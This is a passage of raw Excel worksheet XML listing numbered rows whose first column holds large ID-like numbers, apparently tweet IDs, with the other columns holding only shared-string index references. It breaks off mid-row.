    <row r="2049" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2049">
        <v>1.2352526362717199E+18</v>
      </c>
      <c r="B2049" t="s">
        <v>5223</v>
      </c>
      <c r="C2049" t="s">
        <v>1</v>
      </c>
      <c r="D2049" t="s">
        <v>5224</v>
      </c>
      <c r="E2049" t="s">
        <v>1969</v>
      </c>
    </row>
    <row r="2050" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2050">
        <v>1.2352523757802399E+18</v>
      </c>
      <c r="B2050" t="s">
        <v>5225</v>
      </c>
      <c r="C2050" t="s">
        <v>1</v>
      </c>
      <c r="D2050" t="s">
        <v>5226</v>
      </c>
      <c r="E2050" t="s">
        <v>5227</v>
      </c>
    </row>
    <row r="2051" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2051">
        <v>1.2352520574829499E+18</v>
      </c>
      <c r="B2051" t="s">
        <v>5228</v>
      </c>
      <c r="C2051" t="s">
        <v>1</v>
      </c>
      <c r="D2051" t="s">
        <v>5229</v>
      </c>
      <c r="E2051" t="s">
        <v>4965</v>
      </c>
    </row>
    <row r="2052" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2052">
        <v>1.2352520177922401E+18</v>
      </c>
      <c r="B2052" t="s">
        <v>5230</v>
      </c>
      <c r="C2052" t="s">
        <v>1</v>
      </c>
      <c r="D2052" t="s">
        <v>5231</v>
      </c>
      <c r="E2052" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="2053" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2053">
        <v>1.23525198831039E+18</v>
      </c>
      <c r="B2053" t="s">
        <v>5232</v>
      </c>
      <c r="C2053" t="s">
        <v>1</v>
      </c>
      <c r="D2053" t="s">
        <v>5233</v>
      </c>
      <c r="E2053" t="s">
        <v>4233</v>
      </c>
    </row>
    <row r="2054" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2054">
        <v>1.23525192523214E+18</v>
      </c>
      <c r="B2054" t="s">
        <v>5234</v>
      </c>
      <c r="C2054" t="s">
        <v>1</v>
      </c>
      <c r="D2054" t="s">
        <v>5235</v>
      </c>
      <c r="E2054" t="s">
        <v>5236</v>
      </c>
    </row>
    <row r="2055" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2055">
        <v>1.2352519167892101E+18</v>
      </c>
      <c r="B2055" t="s">
        <v>5237</v>
      </c>
      <c r="C2055" t="s">
        <v>1</v>
      </c>
      <c r="D2055" t="s">
        <v>5238</v>
      </c>
      <c r="E2055" t="s">
        <v>5239</v>
      </c>
    </row>
    <row r="2056" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2056">
        <v>1.2352518476878799E+18</v>
      </c>
      <c r="B2056" t="s">
        <v>5240</v>
      </c>
      <c r="C2056" t="s">
        <v>1</v>
      </c>
      <c r="D2056" t="s">
        <v>5241</v>
      </c>
      <c r="E2056" t="s">
        <v>5242</v>
      </c>
    </row>
    <row r="2057" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2057">
        <v>1.2352516968063501E+18</v>
      </c>
      <c r="B2057" t="s">
        <v>5243</v>
      </c>
      <c r="C2057" t="s">
        <v>1</v>
      </c>
      <c r="D2057" t="s">
        <v>5244</v>
      </c>
      <c r="E2057" t="s">
        <v>5245</v>
      </c>
    </row>
    <row r="2058" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2058">
        <v>1.2352515895915699E+18</v>
      </c>
      <c r="B2058" t="s">
        <v>5246</v>
      </c>
      <c r="C2058" t="s">
        <v>1</v>
      </c>
      <c r="D2058" t="s">
        <v>5247</v>
      </c>
      <c r="E2058" t="s">
        <v>5248</v>
      </c>
    </row>
    <row r="2059" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2059">
        <v>1.2352514290252001E+18</v>
      </c>
      <c r="B2059" t="s">
        <v>5249</v>
      </c>
      <c r="C2059" t="s">
        <v>1</v>
      </c>
      <c r="D2059" t="s">
        <v>5250</v>
      </c>
      <c r="E2059" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="2060" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2060">
        <v>1.2352514230860301E+18</v>
      </c>
      <c r="B2060" t="s">
        <v>5251</v>
      </c>
      <c r="C2060" t="s">
        <v>1</v>
      </c>
      <c r="D2060" t="s">
        <v>5252</v>
      </c>
      <c r="E2060" t="s">
        <v>5253</v>
      </c>
    </row>
    <row r="2061" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2061">
        <v>1.2352512404744801E+18</v>
      </c>
      <c r="B2061" t="s">
        <v>5254</v>
      </c>
      <c r="C2061" t="s">
        <v>1</v>
      </c>
      <c r="D2061" t="s">
        <v>5255</v>
      </c>
      <c r="E2061" t="s">
        <v>5256</v>
      </c>
    </row>
    <row r="2062" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2062">
        <v>1.2352512152415301E+18</v>
      </c>
      <c r="B2062" t="s">
        <v>5257</v>
      </c>
      <c r="C2062" t="s">
        <v>1</v>
      </c>
      <c r="D2062" t="s">
        <v>5258</v>
      </c>
      <c r="E2062" t="s">
        <v>4400</v>
      </c>
    </row>
    <row r="2063" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2063">
        <v>1.2352511121245199E+18</v>
      </c>
      <c r="B2063" t="s">
        <v>5259</v>
      </c>
      <c r="C2063" t="s">
        <v>1</v>
      </c>
      <c r="D2063" t="s">
        <v>5260</v>
      </c>
      <c r="E2063" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="2064" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2064">
        <v>1.2352510928307699E+18</v>
      </c>
      <c r="B2064" t="s">
        <v>5261</v>
      </c>
      <c r="C2064" t="s">
        <v>1</v>
      </c>
      <c r="D2064" t="s">
        <v>5262</v>
      </c>
      <c r="E2064" t="s">
        <v>5263</v>
      </c>
    </row>
    <row r="2065" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2065">
        <v>1.2352510560213601E+18</v>
      </c>
      <c r="B2065" t="s">
        <v>5264</v>
      </c>
      <c r="C2065" t="s">
        <v>1</v>
      </c>
      <c r="D2065" t="s">
        <v>5265</v>
      </c>
      <c r="E2065" t="s">
        <v>1431</v>
      </c>
    </row>
    <row r="2066" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2066">
        <v>1.2352510521668401E+18</v>
      </c>
      <c r="B2066" t="s">
        <v>5266</v>
      </c>
      <c r="C2066" t="s">
        <v>1</v>
      </c>
      <c r="D2066" t="s">
        <v>5267</v>
      </c>
      <c r="E2066" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="2067" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2067">
        <v>1.23525105125667E+18</v>
      </c>
      <c r="B2067" t="s">
        <v>5266</v>
      </c>
      <c r="C2067" t="s">
        <v>1</v>
      </c>
      <c r="D2067" t="s">
        <v>5268</v>
      </c>
      <c r="E2067" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="2068" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2068">
        <v>1.2352510503297201E+18</v>
      </c>
      <c r="B2068" t="s">
        <v>5269</v>
      </c>
      <c r="C2068" t="s">
        <v>1</v>
      </c>
      <c r="D2068" t="s">
        <v>5270</v>
      </c>
      <c r="E2068" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="2069" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2069">
        <v>1.2352510493649999E+18</v>
      </c>
      <c r="B2069" t="s">
        <v>5269</v>
      </c>
      <c r="C2069" t="s">
        <v>1</v>
      </c>
      <c r="D2069" t="s">
        <v>5271</v>
      </c>
      <c r="E2069" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="2070" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2070">
        <v>1.2352510484674501E+18</v>
      </c>
      <c r="B2070" t="s">
        <v>5269</v>
      </c>
      <c r="C2070" t="s">
        <v>1</v>
      </c>
      <c r="D2070" t="s">
        <v>5272</v>
      </c>
      <c r="E2070" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="2071" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2071">
        <v>1.23525104752787E+18</v>
      </c>
      <c r="B2071" t="s">
        <v>5269</v>
      </c>
      <c r="C2071" t="s">
        <v>1</v>
      </c>
      <c r="D2071" t="s">
        <v>5273</v>
      </c>
      <c r="E2071" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="2072" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2072">
        <v>1.2352510466261399E+18</v>
      </c>
      <c r="B2072" t="s">
        <v>5269</v>
      </c>
      <c r="C2072" t="s">
        <v>1</v>
      </c>
      <c r="D2072" t="s">
        <v>5274</v>
      </c>
      <c r="E2072" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="2073" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2073">
        <v>1.2352510456866299E+18</v>
      </c>
      <c r="B2073" t="s">
        <v>5275</v>
      </c>
      <c r="C2073" t="s">
        <v>1</v>
      </c>
      <c r="D2073" t="s">
        <v>5276</v>
      </c>
      <c r="E2073" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="2074" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2074">
        <v>1.23525104468835E+18</v>
      </c>
      <c r="B2074" t="s">
        <v>5275</v>
      </c>
      <c r="C2074" t="s">
        <v>1</v>
      </c>
      <c r="D2074" t="s">
        <v>5277</v>
      </c>
      <c r="E2074" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="2075" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2075">
        <v>1.23525104335459E+18</v>
      </c>
      <c r="B2075" t="s">
        <v>5275</v>
      </c>
      <c r="C2075" t="s">
        <v>1</v>
      </c>
      <c r="D2075" t="s">
        <v>5278</v>
      </c>
      <c r="E2075" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="2076" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2076">
        <v>1.2352509424356201E+18</v>
      </c>
      <c r="B2076" t="s">
        <v>5279</v>
      </c>
      <c r="C2076" t="s">
        <v>1</v>
      </c>
      <c r="D2076" t="s">
        <v>5280</v>
      </c>
      <c r="E2076" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="2077" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2077">
        <v>1.2352509410598999E+18</v>
      </c>
      <c r="B2077" t="s">
        <v>5281</v>
      </c>
      <c r="C2077" t="s">
        <v>1</v>
      </c>
      <c r="D2077" t="s">
        <v>5282</v>
      </c>
      <c r="E2077" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="2078" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2078">
        <v>1.2352509395708101E+18</v>
      </c>
      <c r="B2078" t="s">
        <v>5281</v>
      </c>
      <c r="C2078" t="s">
        <v>1</v>
      </c>
      <c r="D2078" t="s">
        <v>5283</v>
      </c>
      <c r="E2078" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="2079" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2079">
        <v>1.23525093704594E+18</v>
      </c>
      <c r="B2079" t="s">
        <v>5284</v>
      </c>
      <c r="C2079" t="s">
        <v>1</v>
      </c>
      <c r="D2079" t="s">
        <v>5285</v>
      </c>
      <c r="E2079" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="2080" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2080">
        <v>1.23525093397569E+18</v>
      </c>
      <c r="B2080" t="s">
        <v>5284</v>
      </c>
      <c r="C2080" t="s">
        <v>1</v>
      </c>
      <c r="D2080" t="s">
        <v>5286</v>
      </c>
      <c r="E2080" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="2081" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2081">
        <v>1.23525093199182E+18</v>
      </c>
      <c r="B2081" t="s">
        <v>5287</v>
      </c>
      <c r="C2081" t="s">
        <v>1</v>
      </c>
      <c r="D2081" t="s">
        <v>5288</v>
      </c>
      <c r="E2081" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="2082" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2082">
        <v>1.2352509303391501E+18</v>
      </c>
      <c r="B2082" t="s">
        <v>5287</v>
      </c>
      <c r="C2082" t="s">
        <v>1</v>
      </c>
      <c r="D2082" t="s">
        <v>5289</v>
      </c>
      <c r="E2082" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="2083" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2083">
        <v>1.23525092781422E+18</v>
      </c>
      <c r="B2083" t="s">
        <v>5290</v>
      </c>
      <c r="C2083" t="s">
        <v>1</v>
      </c>
      <c r="D2083" t="s">
        <v>5291</v>
      </c>
      <c r="E2083" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="2084" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2084">
        <v>1.23525092596033E+18</v>
      </c>
      <c r="B2084" t="s">
        <v>5290</v>
      </c>
      <c r="C2084" t="s">
        <v>1</v>
      </c>
      <c r="D2084" t="s">
        <v>5292</v>
      </c>
      <c r="E2084" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="2085" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2085">
        <v>1.2352508002611999E+18</v>
      </c>
      <c r="B2085" t="s">
        <v>5293</v>
      </c>
      <c r="C2085" t="s">
        <v>1</v>
      </c>
      <c r="D2085" t="s">
        <v>5294</v>
      </c>
      <c r="E2085" t="s">
        <v>2132</v>
      </c>
    </row>
    <row r="2086" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2086">
        <v>1.2352507149071501E+18</v>
      </c>
      <c r="B2086" t="s">
        <v>5295</v>
      </c>
      <c r="C2086" t="s">
        <v>1</v>
      </c>
      <c r="D2086" t="s">
        <v>5296</v>
      </c>
      <c r="E2086" t="s">
        <v>460</v>
      </c>
    </row>
    <row r="2087" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2087">
        <v>1.2352505831095401E+18</v>
      </c>
      <c r="B2087" t="s">
        <v>5297</v>
      </c>
      <c r="C2087" t="s">
        <v>1</v>
      </c>
      <c r="D2087" t="s">
        <v>5298</v>
      </c>
      <c r="E2087" t="s">
        <v>5299</v>
      </c>
    </row>
    <row r="2088" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2088">
        <v>1.2352505560813299E+18</v>
      </c>
      <c r="B2088" t="s">
        <v>5300</v>
      </c>
      <c r="C2088" t="s">
        <v>1</v>
      </c>
      <c r="D2088" t="s">
        <v>5301</v>
      </c>
      <c r="E2088" t="s">
        <v>431</v>
      </c>
    </row>
    <row r="2089" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2089">
        <v>1.23525027055005E+18</v>
      </c>
      <c r="B2089" t="s">
        <v>5302</v>
      </c>
      <c r="C2089" t="s">
        <v>1</v>
      </c>
      <c r="D2089" t="s">
        <v>5303</v>
      </c>
      <c r="E2089" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="2090" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2090">
        <v>1.2352501937607301E+18</v>
      </c>
      <c r="B2090" t="s">
        <v>5304</v>
      </c>
      <c r="C2090" t="s">
        <v>1</v>
      </c>
      <c r="D2090" t="s">
        <v>5305</v>
      </c>
      <c r="E2090" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="2091" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2091">
        <v>1.2352501609107799E+18</v>
      </c>
      <c r="B2091" t="s">
        <v>5306</v>
      </c>
      <c r="C2091" t="s">
        <v>1</v>
      </c>
      <c r="D2091" t="s">
        <v>5307</v>
      </c>
      <c r="E2091" t="s">
        <v>1390</v>
      </c>
    </row>
    <row r="2092" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2092">
        <v>1.2352500145717E+18</v>
      </c>
      <c r="B2092" t="s">
        <v>5308</v>
      </c>
      <c r="C2092" t="s">
        <v>1</v>
      </c>
      <c r="D2092" t="s">
        <v>5309</v>
      </c>
      <c r="E2092" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="2093" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2093">
        <v>1.2352499921615201E+18</v>
      </c>
      <c r="B2093" t="s">
        <v>5310</v>
      </c>
      <c r="C2093" t="s">
        <v>1</v>
      </c>
      <c r="D2093" t="s">
        <v>5311</v>
      </c>
      <c r="E2093" t="s">
        <v>5312</v>
      </c>
    </row>
    <row r="2094" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2094">
        <v>1.2352499763741599E+18</v>
      </c>
      <c r="B2094" t="s">
        <v>5313</v>
      </c>
      <c r="C2094" t="s">
        <v>1</v>
      </c>
      <c r="D2094" t="s">
        <v>5314</v>
      </c>
      <c r="E2094" t="s">
        <v>2818</v>
      </c>
    </row>
    <row r="2095" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2095">
        <v>1.23524994253871E+18</v>
      </c>
      <c r="B2095" t="s">
        <v>5315</v>
      </c>
      <c r="C2095" t="s">
        <v>1</v>
      </c>
      <c r="D2095" t="s">
        <v>5316</v>
      </c>
      <c r="E2095" t="s">
        <v>3618</v>
      </c>
    </row>
    <row r="2096" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2096">
        <v>1.23524971688097E+18</v>
      </c>
      <c r="B2096" t="s">
        <v>5317</v>
      </c>
      <c r="C2096" t="s">
        <v>1</v>
      </c>
      <c r="D2096" t="s">
        <v>5318</v>
      </c>
      <c r="E2096" t="s">
        <v>356</v>
      </c>
    </row>
    <row r="2097" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2097">
        <v>1.23524954314864E+18</v>
      </c>
      <c r="B2097" t="s">
        <v>5319</v>
      </c>
      <c r="C2097" t="s">
        <v>1</v>
      </c>
      <c r="D2097" t="s">
        <v>5320</v>
      </c>
      <c r="E2097" t="s">
        <v>5321</v>
      </c>
    </row>
    <row r="2098" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2098">
        <v>1.2352495100723599E+18</v>
      </c>
      <c r="B2098" t="s">
        <v>5322</v>
      </c>
      <c r="C2098" t="s">
        <v>1</v>
      </c>
      <c r="D2098" t="s">
        <v>5323</v>
      </c>
      <c r="E2098" t="s">
        <v>4809</v>
      </c>
    </row>
    <row r="2099" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2099">
        <v>1.2352493742608699E+18</v>
      </c>
      <c r="B2099" t="s">
        <v>5324</v>
      </c>
      <c r="C2099" t="s">
        <v>1</v>
      </c>
      <c r="D2099" t="s">
        <v>5325</v>
      </c>
      <c r="E2099" t="s">
        <v>5326</v>
      </c>
    </row>
    <row r="2100" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2100">
        <v>1.23524904673599E+18</v>
      </c>
      <c r="B2100" t="s">
        <v>5327</v>
      </c>
      <c r="C2100" t="s">
        <v>1</v>
      </c>
      <c r="D2100" t="s">
        <v>5328</v>
      </c>
      <c r="E2100" t="s">
        <v>5329</v>
      </c>
    </row>
    <row r="2101" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2101">
        <v>1.23524890777026E+18</v>
      </c>
      <c r="B2101" t="s">
        <v>5330</v>
      </c>
      <c r="C2101" t="s">
        <v>1</v>
      </c>
      <c r="D2101" t="s">
        <v>5331</v>
      </c>
      <c r="E2101" t="s">
        <v>5332</v>
      </c>
    </row>
    <row r="2102" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2102">
        <v>1.2352487880816901E+18</v>
      </c>
      <c r="B2102" t="s">
        <v>5333</v>
      </c>
      <c r="C2102" t="s">
        <v>1</v>
      </c>
      <c r="D2102" t="s">
        <v>5334</v>
      </c>
      <c r="E2102" t="s">
        <v>2071</v>
      </c>
    </row>
    <row r="2103" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2103">
        <v>1.2352487781411899E+18</v>
      </c>
      <c r="B2103" t="s">
        <v>5335</v>
      </c>
      <c r="C2103" t="s">
        <v>1</v>
      </c>
      <c r="D2103" t="s">
        <v>5336</v>
      </c>
      <c r="E2103" t="s">
        <v>5337</v>
      </c>
    </row>
    <row r="2104" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2104">
        <v>1.2352487417429801E+18</v>
      </c>
      <c r="B2104" t="s">
        <v>5338</v>
      </c>
      <c r="C2104" t="s">
        <v>1</v>
      </c>
      <c r="D2104" t="s">
        <v>5339</v>
      </c>
      <c r="E2104" t="s">
        <v>5340</v>
      </c>
    </row>
    <row r="2105" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2105">
        <v>1.2352487126807099E+18</v>
      </c>
      <c r="B2105" t="s">
        <v>5341</v>
      </c>
      <c r="C2105" t="s">
        <v>1</v>
      </c>
      <c r="D2105" t="s">
        <v>5342</v>
      </c>
      <c r="E2105" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2106" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2106">
        <v>1.2352484854625999E+18</v>
      </c>
      <c r="B2106" t="s">
        <v>5343</v>
      </c>
      <c r="C2106" t="s">
        <v>1</v>
      </c>
      <c r="D2106" t="s">
        <v>5344</v>
      </c>
      <c r="E2106" t="s">
        <v>5345</v>
      </c>
    </row>
    <row r="2107" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2107">
        <v>1.2352482395631501E+18</v>
      </c>
      <c r="B2107" t="s">
        <v>5346</v>
      </c>
      <c r="C2107" t="s">
        <v>1</v>
      </c>
      <c r="D2107" t="s">
        <v>5347</v>
      </c>
      <c r="E2107" t="s">
        <v>5348</v>
      </c>
    </row>
    <row r="2108" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2108">
        <v>1.2352473596315599E+18</v>
      </c>
      <c r="B2108" t="s">
        <v>5349</v>
      </c>
      <c r="C2108" t="s">
        <v>1</v>
      </c>
      <c r="D2108" t="s">
        <v>5350</v>
      </c>
      <c r="E2108" t="s">
        <v>5351</v>
      </c>
    </row>
    <row r="2109" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2109">
        <v>1.2352473248526001E+18</v>
      </c>
      <c r="B2109" t="s">
        <v>5352</v>
      </c>
      <c r="C2109" t="s">
        <v>1</v>
      </c>
      <c r="D2109" t="s">
        <v>5353</v>
      </c>
      <c r="E2109" t="s">
        <v>5354</v>
      </c>
    </row>
    <row r="2110" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2110">
        <v>1.23524662683217E+18</v>
      </c>
      <c r="B2110" t="s">
        <v>5355</v>
      </c>
      <c r="C2110" t="s">
        <v>1</v>
      </c>
      <c r="D2110" t="s">
        <v>5356</v>
      </c>
      <c r="E2110" t="s">
        <v>5357</v>
      </c>
    </row>
    <row r="2111" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2111">
        <v>1.2352465291594099E+18</v>
      </c>
      <c r="B2111" t="s">
        <v>5358</v>
      </c>
      <c r="C2111" t="s">
        <v>1</v>
      </c>
      <c r="D2111" t="s">
        <v>5359</v>
      </c>
      <c r="E2111" t="s">
        <v>5360</v>
      </c>
    </row>
    <row r="2112" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2112">
        <v>1.23524614552752E+18</v>
      </c>
      <c r="B2112" t="s">
        <v>5361</v>
      </c>
      <c r="C2112" t="s">
        <v>1</v>
      </c>
      <c r="D2112" t="s">
        <v>5362</v>
      </c>
      <c r="E2112" t="s">
        <v>5363</v>
      </c>
    </row>
    <row r="2113" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2113">
        <v>1.2352459934586601E+18</v>
      </c>
      <c r="B2113" t="s">
        <v>5364</v>
      </c>
      <c r="C2113" t="s">
        <v>1</v>
      </c>
      <c r="D2113" t="s">
        <v>5365</v>
      </c>
      <c r="E2113" t="s">
        <v>1399</v>
      </c>
    </row>
    <row r="2114" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2114">
        <v>1.2352455259741701E+18</v>
      </c>
      <c r="B2114" t="s">
        <v>5366</v>
      </c>
      <c r="C2114" t="s">
        <v>1</v>
      </c>
      <c r="D2114" t="s">
        <v>5367</v>
      </c>
      <c r="E2114" t="s">
        <v>5368</v>
      </c>
    </row>
    <row r="2115" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2115">
        <v>1.23524499091538E+18</v>
      </c>
      <c r="B2115" t="s">
        <v>5369</v>
      </c>
      <c r="C2115" t="s">
        <v>1</v>
      </c>
      <c r="D2115" t="s">
        <v>5370</v>
      </c>
      <c r="E2115" t="s">
        <v>5371</v>
      </c>
    </row>
    <row r="2116" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2116">
        <v>1.23524477662414E+18</v>
      </c>
      <c r="B2116" t="s">
        <v>5372</v>
      </c>
      <c r="C2116" t="s">
        <v>1</v>
      </c>
      <c r="D2116" t="s">
        <v>5373</v>
      </c>
      <c r="E2116" t="s">
        <v>5374</v>
      </c>
    </row>
    <row r="2117" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2117">
        <v>1.2352446322058099E+18</v>
      </c>
      <c r="B2117" t="s">
        <v>5375</v>
      </c>
      <c r="C2117" t="s">
        <v>1</v>
      </c>
      <c r="D2117" t="s">
        <v>2186</v>
      </c>
      <c r="E2117" t="s">
        <v>2102</v>
      </c>
    </row>
    <row r="2118" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2118">
        <v>1.2352437390874299E+18</v>
      </c>
      <c r="B2118" t="s">
        <v>5376</v>
      </c>
      <c r="C2118" t="s">
        <v>1</v>
      </c>
      <c r="D2118" t="s">
        <v>5377</v>
      </c>
      <c r="E2118" t="s">
        <v>1412</v>
      </c>
    </row>
    <row r="2119" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2119">
        <v>1.23524345822861E+18</v>
      </c>
      <c r="B2119" t="s">
        <v>5378</v>
      </c>
      <c r="C2119" t="s">
        <v>1</v>
      </c>
      <c r="D2119" t="s">
        <v>5379</v>
      </c>
      <c r="E2119" t="s">
        <v>5380</v>
      </c>
    </row>
    <row r="2120" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2120">
        <v>1.23524332915311E+18</v>
      </c>
      <c r="B2120" t="s">
        <v>5381</v>
      </c>
      <c r="C2120" t="s">
        <v>1</v>
      </c>
      <c r="D2120" t="s">
        <v>5382</v>
      </c>
      <c r="E2120" t="s">
        <v>1816</v>
      </c>
    </row>
    <row r="2121" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2121">
        <v>1.23524314092945E+18</v>
      </c>
      <c r="B2121" t="s">
        <v>5383</v>
      </c>
      <c r="C2121" t="s">
        <v>1</v>
      </c>
      <c r="D2121" t="s">
        <v>5384</v>
      </c>
      <c r="E2121" t="s">
        <v>1743</v>
      </c>
    </row>
    <row r="2122" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2122">
        <v>1.2352430347465101E+18</v>
      </c>
      <c r="B2122" t="s">
        <v>5385</v>
      </c>
      <c r="C2122" t="s">
        <v>1</v>
      </c>
      <c r="D2122" t="s">
        <v>5386</v>
      </c>
      <c r="E2122" t="s">
        <v>5387</v>
      </c>
    </row>
    <row r="2123" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2123">
        <v>1.23524249762815E+18</v>
      </c>
      <c r="B2123" t="s">
        <v>5388</v>
      </c>
      <c r="C2123" t="s">
        <v>1</v>
      </c>
      <c r="D2123" t="s">
        <v>5389</v>
      </c>
      <c r="E2123" t="s">
        <v>5029</v>
      </c>
    </row>
    <row r="2124" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2124">
        <v>1.23524249245231E+18</v>
      </c>
      <c r="B2124" t="s">
        <v>5390</v>
      </c>
      <c r="C2124" t="s">
        <v>1</v>
      </c>
      <c r="D2124" t="s">
        <v>5391</v>
      </c>
      <c r="E2124" t="s">
        <v>5032</v>
      </c>
    </row>
    <row r="2125" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2125">
        <v>1.23524240762258E+18</v>
      </c>
      <c r="B2125" t="s">
        <v>5392</v>
      </c>
      <c r="C2125" t="s">
        <v>1</v>
      </c>
      <c r="D2125" t="s">
        <v>5393</v>
      </c>
      <c r="E2125" t="s">
        <v>5394</v>
      </c>
    </row>
    <row r="2126" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2126">
        <v>1.23524192025278E+18</v>
      </c>
      <c r="B2126" t="s">
        <v>5395</v>
      </c>
      <c r="C2126" t="s">
        <v>1</v>
      </c>
      <c r="D2126" t="s">
        <v>5396</v>
      </c>
      <c r="E2126" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="2127" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2127">
        <v>1.2352412915014999E+18</v>
      </c>
      <c r="B2127" t="s">
        <v>5397</v>
      </c>
      <c r="C2127" t="s">
        <v>1</v>
      </c>
      <c r="D2127" t="s">
        <v>5398</v>
      </c>
      <c r="E2127" t="s">
        <v>5399</v>
      </c>
    </row>
    <row r="2128" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2128">
        <v>1.23524117739536E+18</v>
      </c>
      <c r="B2128" t="s">
        <v>5400</v>
      </c>
      <c r="C2128" t="s">
        <v>1</v>
      </c>
      <c r="D2128" t="s">
        <v>5401</v>
      </c>
      <c r="E2128" t="s">
        <v>5402</v>
      </c>
    </row>
    <row r="2129" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2129">
        <v>1.2352411014783401E+18</v>
      </c>
      <c r="B2129" t="s">
        <v>5403</v>
      </c>
      <c r="C2129" t="s">
        <v>1</v>
      </c>
      <c r="D2129" t="s">
        <v>5404</v>
      </c>
      <c r="E2129" t="s">
        <v>2620</v>
      </c>
    </row>
    <row r="2130" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2130">
        <v>1.2352409172645399E+18</v>
